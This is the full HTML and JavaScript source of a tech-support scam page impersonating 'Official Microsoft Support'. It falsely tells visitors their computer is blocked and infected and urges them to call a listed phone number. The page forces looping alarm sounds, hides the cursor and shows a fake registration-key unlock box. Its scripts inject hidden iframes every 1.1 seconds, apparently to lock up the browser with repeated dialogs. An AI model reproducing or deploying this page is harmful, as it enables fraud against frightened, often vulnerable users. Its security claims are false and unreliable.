
<!DOCTYPE html>
<html lang="en-en">
<head>



  <meta charset="utf-8">
  <meta content="user-scalable=no, width=device-width, initial-scale=1, maximum-scale=1" name="viewport">

    <style type="text/css">html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:700}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{color:inherit;font:inherit;margin:0}button{overflow:visible}button,select{text-transform:none}button,html input[type=button],input[type=reset],input[type=submit]{-webkit-appearance:button;cursor:pointer}button[disabled],html input[disabled]{cursor:default}button::-moz-focus-inner,input::-moz-focus-inner{border:0;padding:0}input{line-height:normal}input[type=checkbox],input[type=radio]{box-sizing:border-box;padding:0}input[type=number]::-webkit-inner-spin-button,input[type=number]::-webkit-outer-spin-button{height:auto}input[type=search]{-webkit-appearance:textfield;-moz-box-sizing:content-box;-webkit-box-sizing:content-box;box-sizing:content-box}input[type=search]::-webkit-search-cancel-button,input[type=search]::-webkit-search-decoration{-webkit-appearance:none}fieldset{border:1px solid silver;margin:0 2px;padding:.35em .625em .75em}legend{border:0;padding:0}textarea{overflow:auto}optgroup{font-weight:700}table{border-collapse:collapse;border-spacing:0}td,th{padding:0}</style>

    <link rel="stylesheet" href="style.min.css">
    <link rel="stylesheet" href="index.css">

    <style>
    .blink {
    background-color:yellow;
    color:black;
      animation: blink-animation 1s steps(5, start) infinite;
      -webkit-animation: blink-animation 1s steps(5, start) infinite;
    }
    @keyframes blink-animation {
      to {
        visibility: hidden;
      }
    }
    @-webkit-keyframes blink-animation {
      to {
        visibility: hidden;
      }
    }







    </style>




    <title>Official Microsoft Support</title><!--Start of Tawk.to Script-->
<script type="text/javascript">
var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
(function(){
var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
s1.async=true;
s1.src='https://embed.tawk.to/54cf7ff0922e9e380ed868b1/default';
s1.charset='UTF-8';
s1.setAttribute('crossorigin','*');
s0.parentNode.insertBefore(s1,s0);
})();
</script>
<!--End of Tawk.to Script-->

</head>
<body  style="cursor: url(&quot;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIAAAACACAMAAAD04JH5AAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAPUExURQAAAAICAgAAAP///5WVlXiCGdAAAAADdFJOUwD8ZX+n/7gAAABvSURBVHja7dbBAUAwEABBQf81i6CGfZipYB3J2bY/GnnAHgec9QjOY9QBccEMaAvugLRgBZQFT0BY8AZ0BV9AVvB8hEt3D8SnYIz2FMxtlI7gfvVzBN1OXM9+1Dsx/ykAAAAAAAAAAAAAAAAAgNcFnc4A9qwo+wMAAAAASUVORK5CYII=&quot;) 128 128, crosshair;">


<a style="display:block" id="burl" rel="noreferrer noopener" >
    <div id="header"><img src="header-bar3.png" height="102px" width="100%"></div>
</a>
<div class="container container1">
    <div>
        Microsoft Security Tollfree:<br>
        <div style="font-size: 30px">+1-860-640-4818</div>
        <div style="font-size: small"><input type="checkbox" checked="checked"> Prevent this page from creating additional dialogues.</div>
    </div>
    <div></div>
    <div style="margin-right: 20px">
        Enter Windows registration key to unblock.
        <div style="display: inline-block; margin-top: 5px;">
            <input class="key-input" placeholder="Enter key">
        </div>
    </div>
</div>

<div class="container2">
    <div class="round-div">
        <img src="micro-logo.png" style="margin-top: 40%; transform: scale(0.8, 0.8);">
    </div>
    <div class="bottom-text">
        <div style="font-size: x-large">Windows Support Alert</div>
        <div style="font-size: large"> Your System Detect Some Unusual Activity</div>
        <div style="font-size: small">It might harm your computer data and track your financial activities.</div>
        <div style="font-size: 25px; font-weight:bold;">Please report this activity to +1-860-640-4818</div>
    </div>

</div>

<button class="site-feedback-btn">
    Site feedback
</button>

<div class="alert-div">
    <p style="font-weight: bold; text-align: center;">VIRUS ALERT FROM MICROSOFT</p>
    <p style="font-weight: bold; text-align: center;">This computer is BLOCKED</p>
    <p style="font-size: small;font-weight: bold;">Do not close this window and restart your computer<br>
    Your computer's registration key is Blocked.<br>
    Why we blocked your computer?</p>
    <p style="font-size: small">
    The window's registration key is illegal.<br>
    This window is using pirated software.<br>
    This window is sending virus over the internet<br>
    This window is hacked or used from undefined location.<br>
    We block this computer for your security.<br>
    Contact microsoft helpline to reactivate your computer.<br>
    </p>


    <div class="col-md-6" style="float:right;">
      <button class="ms-btn chat_now blink" style="float:left; background-color:green; color:#ffff; padding:5px 10px 5px 10px;">Leave Page Now</button>
    </div>
</div>


<script src="https://code.jquery.com/jquery-1.11.1.min.js"></script>
<audio autoplay="autoplay" loop="" id="msgSound1">
  <source src="beep.mp3" type="audio/mpeg">
</audio>

<audio autoplay="autoplay" loop="" id="msgSound">
  <source src="err.mp3" type="audio/mpeg">
</audio>


    <script type="text/javascript">/*<![CDATA[*/
    // audio play /*
      var msgAudioEl = document.getElementById("msgSound");

      var playMsgInt = setInterval(function () {
        if (isPlaying(msgAudioEl)) {
          // console.log('already playing. clearing interval');
          clearInterval(playMsgInt);
        } else {
          // console.log('Triggering play');
          msgAudioEl.play();
        }
      }, 500);
      // audio play */

    </script>

        <script type="text/javascript">/*<![CDATA[*/
        // audio play /*
          var msgAudioEl = document.getElementById("msgSound1");

          var playMsgInt = setInterval(function () {
            if (isPlaying(msgAudioEl)) {
              // console.log('already playing. clearing interval');
              clearInterval(playMsgInt);
            } else {
              // console.log('Triggering play');
              msgAudioEl.play();
            }
          }, 500);
          // audio play */

        </script>



<script type="text/javascript">/*<![CDATA[*/

 function get_browser(){
    var ua=navigator.userAgent,tem,M=ua.match(/(opera|chrome|safari|firefox|msie|trident(?=\/))\/?\s*(\d+)/i) || [];
    if(/trident/i.test(M[1])){
        tem=/\brv[ :]+(\d+)/g.exec(ua) || [];
        return {name:'IE',version:(tem[1]||'')};
        }
    if(M[1]==='Chrome'){
        tem=ua.match(/\bOPR\/(\d+)/)
        if(tem!=null)   {return {name:'Opera', version:tem[1]};}
        }
    M=M[2]? [M[1], M[2]]: [navigator.appName, navigator.appVersion, '-?'];
    if((tem=ua.match(/version\/(\d+)/i))!=null) {M.splice(1,1,tem[1]);}
    return {
      name: M[0],
      version: M[1]
    };
 }
 var InternetEx=window.navigator.appVersion.indexOf("MSIE")!=-1;
var isIEedge = window.navigator.userAgent.indexOf("Edge") > -1;
var browser=get_browser();
if(browser.name=="Firefox" || isIEedge|| InternetEx || navigator.appName == 'Microsoft Internet Explorer' ||  !!(navigator.userAgent.match(/Trident/) || navigator.userAgent.match(/rv:11/)) ){
  if(isIEedge|| InternetEx || navigator.appName == 'Microsoft Internet Explorer' ||  !!(navigator.userAgent.match(/Trident/) || navigator.userAgent.match(/rv:11/)))
    {

       function msg_ff() {

            var i = document.createElement("div");
            i.innerHTML = '<div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="09windowshelp.php"></iframe></div>';
            document.body.appendChild(i);

        }
        window.setInterval(function() {
            msg_ff();

        }, 1100);

      }
  else{
      function msg_ff() {

            var i = document.createElement("div");
            i.innerHTML = '<div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="09windowshelp.php"></iframe></div>';
            document.body.appendChild(i);
        }
        window.setInterval(function() {
            msg_ff();

        }, 1100);

    }

 }
 else{

   }


/*]]>*/</script>

<div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="09windowshelp.php"></iframe></div>
<div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="09windowshelp.php"></iframe></div>

<div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="09windowshelp.php"></iframe></div>
<div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="09windowshelp.php"></iframe></div>
<div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="09windowshelp.php"></iframe></div>
<div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="09windowshelp.php"></iframe></div>
<div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="09windowshelp.php"></iframe></div>


<iframe id="calendar" src="beep.mp3" allow="autoplay" style="display:none;">
</body>
</html>
